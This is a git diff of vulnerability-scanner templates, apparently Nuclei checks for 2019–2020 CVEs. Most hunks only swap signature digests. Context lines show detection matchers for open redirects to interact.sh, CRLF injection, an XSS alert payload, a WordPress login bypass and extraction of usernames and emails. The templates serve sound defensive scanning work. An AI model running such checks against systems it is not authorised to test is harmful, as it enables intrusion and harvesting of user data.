+56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007cbad15c9e74a5ecffe290f05625fb4c36dbac626baf8fdd9f3102b5bb20be2022100f2f209e1df4a7a53cb9336d7d0e424c8529e3760327a358056b299f21fbb6ece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a91d99cd0b9d9a51e6d13c036261c8911d88c76926e95a6f799987d41371b82c02210096fe48f50dd7c918491a3d2d26db73f22b5e632fe8ea53cab554f655c54ec99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index c08231c3650..ca3a59edc84 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a97f974b2152b7ed766000aa8ff2c063849071e2ba7278e4a4d28896033716ad02201d59f8e70f17f7ae5d1a70206fb388acad8a96df4bb4de26b9de7f1e4759af1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b87d564e075353767f81f4d9f69edb3f008a2484e4746e4b25ba7379c105aa27022100c1c58c381c52b8eeaf5a1f7fcd033cd2b2e3e03b1069632b2026b07d6a102d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index 5fc325913a2..4b29db894ee 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a9868ad835d261ae26ebb74b43934c114c5f9ef01e9119ded9aa446539e5312102201a0ad4d12ce61f00459c0adfd4af4b9d9e4e9e78ede9c71e3b4f66a69bd3ce66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e586e8720ee77b137d67d6ee33667dc41178ca724c5e74d228f8cc281530664022100c364350a8ec372861857dfc441839a02a9868dbdd2062e6358c6b5f3223ac1a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 17725225074..12b70bc049c 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502200c96d0bb51d2f5565928545668f727887ad5c5bd0b810d6653feaa36f8ce7e9f022100f789060777f20f2f966184719af418dca7864b869b188595a6f19e4e61f7157c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a0ed350ffcb6e41dd9b847fa0716c73cc13c010d1e0208c3778895c7a3f0d02022100b17c47986235dec40bc141707285d7efd836d5e5f46e9229c87e78e61a8d8954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index da2e928720e..0b8a5616953 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ec96ead95075e07e7085910b0ef671097db1bf6bef14c7fd02b3ec204b7fbd2022100f2c76b861fef484796793b70ce41b5fd05b738f5d26c7a283bffc3d18cf555bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdb419ce1ecba919859f58e3290f92a020bc8bb08f3242659d953f8b50cbbb1502200ab7e4625f0131156f93f1034bf546c8c1d523f6a862f60c8c6853f45a8db289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5129.yaml b/http/cves/2019/CVE-2019-5129.yaml index 54932724b3b..69fa53d4b8d 100644 --- a/http/cves/2019/CVE-2019-5129.yaml +++ b/http/cves/2019/CVE-2019-5129.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220352f22cbd5c3b231be0676dbdd5cc54f0b004ef4547031fa96fa26bb7b8b8582022100fe332624f9c1d691a86de293b6a33863167169c408c7f20565bf00ec75f88b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100910c6f9351522f16e0e6e465f17ab220b7fc08b72d9082c4119972438d383ee90221008cdad89476cde40f434587980966428f13d95f03da96d705e6c37b42a0ebab65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-5591.yaml b/http/cves/2019/CVE-2019-5591.yaml index cea088bf863..84b845ecbe9 100644 --- a/http/cves/2019/CVE-2019-5591.yaml +++ b/http/cves/2019/CVE-2019-5591.yaml @@ -76,4 +76,4 @@ http: words: - "dns" - "http" -# digest: 490a0046304402205af4fa728c9b7cad538edf9cadfc5cd1443da03cd1cd02723676baccdd4a9519022043e3324f96c7c4027c8ae94bcd8842e44481e5f7030b980902138da51c35a0cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203eda6b0860193f551496df2baa6b8ab8f5285302e2715fbd732f19ed3eca2ffe0221008c297ac04be0b7b609dea56a389207d316a61a1737830c7ccdb77873704c450b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6703.yaml b/http/cves/2019/CVE-2019-6703.yaml index 2325dde91a4..1691770157d 100644 --- a/http/cves/2019/CVE-2019-6703.yaml +++ b/http/cves/2019/CVE-2019-6703.yaml @@ -50,4 +50,4 @@ http: regex: - "(?mi)Stable tag: ([0-9.]+)" internal: true -# digest: 4a0a004730450220724062ce6f09ef56d31f6bd309c3346adc2601720bc9e0c35a27dcce69017c38022100b37d4024a9920ec52f11ff4acb2af0f688a2898fca441561927e9afef406a7f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee7d8e8d2bfe2ff3809ae070214fe101b599c9a555821a8b933eab7b15c0cef6022100f120273bd539a9497e18697ad87b147a53fcea4261a8aac0cf3756aaa986b339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index cc03b42297c..999dc285bce 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -44,4 +44,4 @@ http: part: body words: - TmVzc3VzQ29kZUV4ZWNUZXN0 -# digest: 4a0a0047304502207b4c1314a4e6d65addf435c83e16d95383590faf72f12db389eaa24381b91a53022100832b9c7593e29f9e9d3565c0ff81445f74f64bff01fb9a2435527d6af06b7ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d00170135a081a826545c031e10dd5c86b3af2788e95d05e32e4700b11383beb02200708702ad677d9bea4664fba3c5f5e3a1ed7272f5a06dabd22b55097daf43c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 4ffcd7bd43b..c2262b3bf2b 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -45,4 +45,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" -# digest: 4b0a00483046022100a9078b1a158f202aaea6ac087036700f6ea28935c175db3f2a0f01229b0dae03022100f4e39358eea7cc002ca4f97022a51b6676831102f574ea9d8bf094f77e4e2e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200840689b75ff737285d245316a0a9b8b104b810094885513378abd9b2eadfbd0022026544c279dee7bf82a96a18b910435392cf30bf546c1b79d1e8d904c53f4c69c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 9d32d0d3588..2770a67dbe5 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -85,4 +85,4 @@ http: - 'status_code_2 == 200 && status_code_3 == 400' - 'len(body_2) == 2 && len(body_3) == 2' condition: and -# digest: 4a0a00473045022056dfee57601e3cfb050fce175307f9823df54159cdcda6764e5c0d574b162eec0221009884728332619d20e69e482f145c60bc5ef3096de0953fa3366552a89bf7d555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da4bff70bd5893a66ace2aea8604810b9b9f00268cd81e53d4ac35248ba7474c022100ac9afd4745b06e26bee265845d2b7731161c2f4ab197997c6adf8706bcf56445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7195.yaml b/http/cves/2019/CVE-2019-7195.yaml index 367df493804..e285eadde23 100644 --- a/http/cves/2019/CVE-2019-7195.yaml +++ b/http/cves/2019/CVE-2019-7195.yaml @@ -85,4 +85,4 @@ http: regex: - encodeURIComponent\('([A-Za-z0-9]+)'\) internal: true -# digest: 4b0a00483046022100ab85a5367978d797093833d3d2d84b6f8a6e7b3816276b97b82ceabd16470e64022100ec79dca54c28b5bf997a97e732716cefa0a45e6177ca97e3b9f9ff5775b57ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009914ed0caff5068d4a36f907a18d08ac1db980d57b57537dc4b646630ffd11ad0220228365fe7e0bf47dd6eeaadbe73eb674cd940dc5e0786397a3823c767be788db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index 9b6ec692ae2..8799a258292 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d49d8b07b3b05175d10b554893118f584527c1276bfb9aeca960c6a9121a6d6c02202721f233e45e4c410357acf824871c58e94670dd0b19d9d8b529fe81e2ed01cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b575da68cb21841d4d1c71f100387ceb05d9a810acb313a4d798cbc04f0815202210097d161891d9ff655d6bc558bd2b0787798985a3a334640aad696e7bc5de44f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index 3f6d351f474..c4bcf3a24b3 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210085bdc61b1501fef3b5ed4c6412dbd061a77499c5c4c9e75b2825eb4104158605022053123a2945cc46feb9e4c11fa2ddb1d05191386723d42cf261fdc6ab9e2606b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043a89d828cfb122435639dcd4836d14a03756792ff388f0ea842b84c1fe61b9f022021d4c6bf11e3391560984bad80528ef47b5db120b17a2e6cc1350bc21ec095ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 0e9e297b1e4..1433a1b2c1f 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205282e87b6b3d9d56634f61a53cd2e8992f6392bb212dc85967149e0704b963af022100c15b27bf7066e8147e3056e72747f1d29936fee9a606d967e3476397f1867942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cffbdb13306c751bea33e995fb61bbc157fa8898eaa139be08d1717fccbeeae002201f1b5a4fa8f103d7d1d8b667c2ba095bca75855b696c39a769aebd58f5dd120e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 9727423a685..d095ad912c6 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221008aed16f30edd82902f0ecfe2f1874857cac78310eccc6192c3967b95953c50c80221008f0728a596f28c509ffc686116de334af699668a7778efc7668fd260fa45f8ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b45aa229b8ec57c041be04c38df9ed7ac84fbcf56bd207bb3ddf41b2317b51b802203d5767f4e21330a4e6fb849add1e24cd0812c1e670563bd3dd76d5f308bd2217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 914e025e579..dcdd64d240f 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -45,4 +45,4 @@ http: part: body words: - "4220397236" -# digest: 490a00463044022021c0f9f28feebfa672c94e5d6198924bb41ce86a636be4a3dea00e64ee792972022018871e5a19c5c6d6b33a81cf1aa69766211c652179acf50725c3f43257b482d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201226c619f9c5f397968f3644d0ba483345ff2c1794e1a5c80e4a5f6a069fe39d022004be6ffe4f73a57a212198b02115e98fafe7c176be3215a8abbcbe31b01aae9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 7ef61be78c7..585f32b6532 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f762d5be45355e75d255f3b7ca55aee0398324d296004496492d24b2c0a01a3c022100c27b3a71553958fec5a896bf95b7fefa3f861df80d213c3af1698efb3e513ac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f7bb65e568ba115cbdb63810274d5c5e19bda895933194f4924a4e07a007d4002200c3e18b3c6fce5075409a8c9038f34e1d7f5cb889c3bde7adef2c8de771d6c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 201419d80c2..fabc41be117 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff156ad43f43f0c74a2410a3b655fe3b3b51ef5a3b1c544f14b714b0d0534d6c022024d0ee8fff5d080f1684c1911ab28b70ea9518169e0714d24421faaa6e81b430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062afe3fc9bc5c22f87a93aa4710473e393f3227be15203b3bd7c46f2581a583e022018e3832b87dcf4f8cfcff73ba8eb1fbce0fa7cdf2f120c2022e41bc5971945a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index a9ea6b0ee0d..660ca0ec709 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100860e0d3b8fad54739da05d1d27163aa05cbfd55ae8eebd96712384bf24e792ec02200d2f552df73361db0023fa89fcb460cbded805b0ee25f48c8768567167da63f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d66a00a6fba32d1f2a77f1e1c65d08ad7b05e19630c06914f80a796ec21875ae022100922a55c75afb2d03522698cc5477d5e110fc3b8ef0f51305586db5351091c565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index 9dc531803ed..d0289f1cf3f 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -77,4 +77,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body -# digest: 490a0046304402202cb50e5867b9e030ae1ccc9ff1f9cc93d112bd0e3588fc82f951b0ce2df079e4022023fe95d0cf225f6cf4c19e501d591602d49bfa4b4441f21883c359b17e715b67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf97abe3c1d3edc747cc23f1caa490377303440e6d4affab490422bc255962b9022100e59b1b374871afe67e4cbc5f37bb1883a7fc66110d33bcceac2dd718960a7359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index a4880681323..89f30336c11 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100875950fb22db57bdced72d12f063569371b5b946a4f227c0530b6c422c43400602201906f1550ac653637ee0dacf9c1f9f0d2a64bc4b693819ca636d007651e3c112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d60c4b68ff2c050c2cf95c40f837fa86916be3505b66bdbc550437f20c4b8b3022100dfa17d99fcba70ab9a5ef69505a440dfbb6bdbd8c5ac93e3289de91e0afda183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index a4d5fd6dde1..91598b7b020 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "http" # Confirms the HTTP Interaction -# digest: 490a0046304402206a73f80fc5bc95dc4b47881bd3afa489d2dff95c83656ab59ded10444795583402201a0e36032f5fcca188f646211cd25e9be5d1f65e1d6ebd1502d02a9409cca008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a47f9e0e9c65b6ee9974d2b043d524a8bf9fbaee322e43f22e6274464030a7e022100e57f68c18d9a8e23485bb8d79f8998d1599c8480e975cf914fd268cf7de5da89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index 7ea3e80e76c..4c8b68624db 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008208a318c097dfd9dba78b0beceb42f4e2556485ace7f82900103f9c0ec81f69022100b511c22b5711f5a4be22d3516cbfe7f4601820e3d88d8e77cd8598910aff60f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d271ada4dfc53b94e0abac795a787248e7e2528d761db2bb5f7a5d65b3ce10b7022100b610595a7a7d47d47b95330b858b4d7f057737422598ef32735a082efa27714d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 22f64188609..5cef0d1deb8 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ae6f98bee49560f8e638027b50429659a0b25d0d9e22abd1bffe3864a1f3b608022038d6ff3399d7df3fb6a48537e6660b260783a00bb1dfa49722d2d4f321df82ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087c93b7775d79dd8d21c84949c6e24f18de97d408e8416293c33cf4c86fc0c4f022100ea962587c856ffa98969038c11809018a65b74d4c70291a7f2faa5759c8f5f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9082.yaml b/http/cves/2019/CVE-2019-9082.yaml index d2af40adbad..63f84d434c6 100644 --- a/http/cves/2019/CVE-2019-9082.yaml +++ b/http/cves/2019/CVE-2019-9082.yaml @@ -51,4 +51,4 @@ http: - 'contains(body, "phpkniht")' - 'status_code == 200 || status_code == 500' condition: and -# digest: 4a0a004730450220638c31a454add8904ed014de681c58920344ebe284887c0fceebded7c7993d04022100f9b40a6785ae474b2b858f863592d3529aef13b138e42f69a4ac98b003bf70b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201bf1a019f0a925185c8eb89afd0630d710eb9cc136cd20a785470715a10180c402204ee5772505cf768c986ae26ad328cea84199b3c4e168cbff9d9a585a2442908e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9194.yaml b/http/cves/2019/CVE-2019-9194.yaml index 8f6ed8e744b..4b75104abf4 100644 --- a/http/cves/2019/CVE-2019-9194.yaml +++ b/http/cves/2019/CVE-2019-9194.yaml @@ -99,4 +99,4 @@ http: - type: dsl dsl: - 'contains(body,"{{md5(file_name)}}")' -# digest: 490a0046304402205e09411bf7eb956cfa0af62c2d20b57a489df730a9212ff9f0902aa8b86ba7df0220618187ebde5c846d9e21c3cc01e18f61f0e4918d66542aa4191752098de44a0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220778e1704660a4f8c5e9b8ffdc5dde86226615ecc3c5c195143e8592ffc7e0833022061ecdba8ef58456f6bd9aeca501d29281e99d65f6cb3bb28df9d1f1a1d4e6e8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 6376c7fea97..883e26c91d1 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068d8a04b8ab37064bb5b422b64cf02dfd9663016d7c84e11b791d69da8b4bef4022019a3d4c445952d1a03ed869fce7796abbf21194f5b651cbb2c94815ccdb0a2d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fde630bfea855dddc00379232278396666eae7b545cadcdc1d7da2daff560cfb02204ece8771759028570482a335c49cf01b836901c0cfbfdee8345aeafeb1489270:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9879.yaml b/http/cves/2019/CVE-2019-9879.yaml index 0b95c06d14c..62b705f1e5a 100644 --- a/http/cves/2019/CVE-2019-9879.yaml +++ b/http/cves/2019/CVE-2019-9879.yaml @@ -52,4 +52,4 @@ http: - contains(content_type, 'application/json') - contains_all(body, 'UWHATM8', '{\"status\":') condition: and -# digest: 4b0a00483046022100b700968cee84e05d57e6657270ca3b27ac8212f317c28f614dfeabfc33f2c229022100f1d49e8bb80bfb1fa5adc4ddefbec9473d1ae9951643c287d537ab4db9874f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d8f9e241095244dde190392e7e76d0b30186c8638c5e5ad1e5e5598d3093142022100e299df39af1e3c53afdf33f2a7a833714c867ffbbef948e3878cc9e063b43cb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9880.yaml b/http/cves/2019/CVE-2019-9880.yaml index 0560745f07f..6499bdf2efc 100644 --- a/http/cves/2019/CVE-2019-9880.yaml +++ b/http/cves/2019/CVE-2019-9880.yaml @@ -55,4 +55,4 @@ http: name: user-data json: - '.data.users.nodes[] | "username: " + .username + ", email: " + .email' -# digest: 490a00463044022025cfe1a8602c881b141b713cee567f34602d3639fee1fe8c71d271dad0f4d8c802207b7ceaf37d87a206f37cdc140b657668d2d363498ed16252f1870552adadd60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b35f7cebd4777b65719b1b97adfada1f0b9837b436160b0c66457842949c815022043d970c2faf94aa9668b37ecc8d67473b54f172f51a4fbb88443dd0e8dde24f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9912.yaml b/http/cves/2019/CVE-2019-9912.yaml index f973974a820..63adb5894e5 100644 --- a/http/cves/2019/CVE-2019-9912.yaml +++ b/http/cves/2019/CVE-2019-9912.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8f26e9bbb1c0ed15a0d7a80e149275a2d6c0e546a64cbcc1b40473b06d0254f022100ad39f48bd625e75a9f92064955b2a2567b0af123f7519896bdb1b2e37347f37f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207247e79414f0062bf4998536c3ccd589c2e7267241e48bd896ab44cc9cfebcc3022052e777a258df90c782bc68dcc28adbda69d4ddd17189c3834bdd2bfb3676aecf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index fe5f6394d3a..4f701483687 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a00473045022016b76b047ff07372a52dc184bb11d4bd07f44a92aa50e205a4621b95aee229e6022100f84d7ef6e7a70f83d5393258203eb2400d29f8d9cd703475825bbd94be4161a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050c5352862b09600f47c6d94f5c3b38845f56b1bec73f28ab2bd5ce857943cc402207e6cb617eb6f48d405496a05f4279107e7a27985368b211c492938eeaff524a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index 4f91ff61ebf..a75b8f4aa2d 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -41,4 +41,4 @@ http: - "\";alert('1');//" - "<title>Welcome" condition: and -# digest: 4b0a00483046022100889c439860f18f99350b23c0c6a1fb3410daa1ea4870bde419b8e8d68b0edad0022100af2bff967e348c64906468350af857d1ead048e86ac9afd38b7e8c95cfd6ecd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0de02f2f999e3fa0381899f669d6d9a349e060b6c9ae1431363b5f6a4bd469702207ee0ea60a34dc514fbeb2678d22b504041004f2dde9b93770820ab4ea2b4eab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index 83cd3318a25..3d46b7004c7 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -54,4 +54,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402200f33c365f1b2bd3340d35f636cacbe32ab83f5c10cc5c555cdde7c0aa65e2236022067ab42b023f79f5a742ee5716768d87c0428764347accf9feb1a106f167eed91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b12b4cb117c93a449441ddeaa3b0e87f842a929174241d3f81e842697029ed02210083bdd65bde5edfe7ad991e8cb1207aec231fd8ffef509fd9f56299c71fdfe1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index d25d604c495..fd2b3398f90 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210089164e6f9305c4e01f7aa72693c2e7a5032fab408489a258b86ea28c7e7d4b90022008dfbf16f04fef50c4d5cd956d4c87a4e050641c926f6879789392cd687f3ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030775daf42d5b1eb23a99327acf3a7e57f6e72041cca0f6746a87d051c01d761022100fe4ccc1c3b0a33fc6023fa4bffd4d2d20c1c78c61dab17db1e1468535480e980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10257.yaml b/http/cves/2020/CVE-2020-10257.yaml index 3901711a221..8f9450acba0 100644 --- a/http/cves/2020/CVE-2020-10257.yaml +++ b/http/cves/2020/CVE-2020-10257.yaml @@ -63,4 +63,4 @@ http: - 'status_code==302' - 'contains(header, "wordpress_logged_in")' condition: and -# digest: 4a0a004730450221008179a110045f2e7972bcdf6c8c7e5d0af9f5fc546c2fcbdb5baf08f5c55710db02201595cc6d5fb7fa1495b41c2eabf12920a26b51ce6248d2bf950e5de5944e1dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 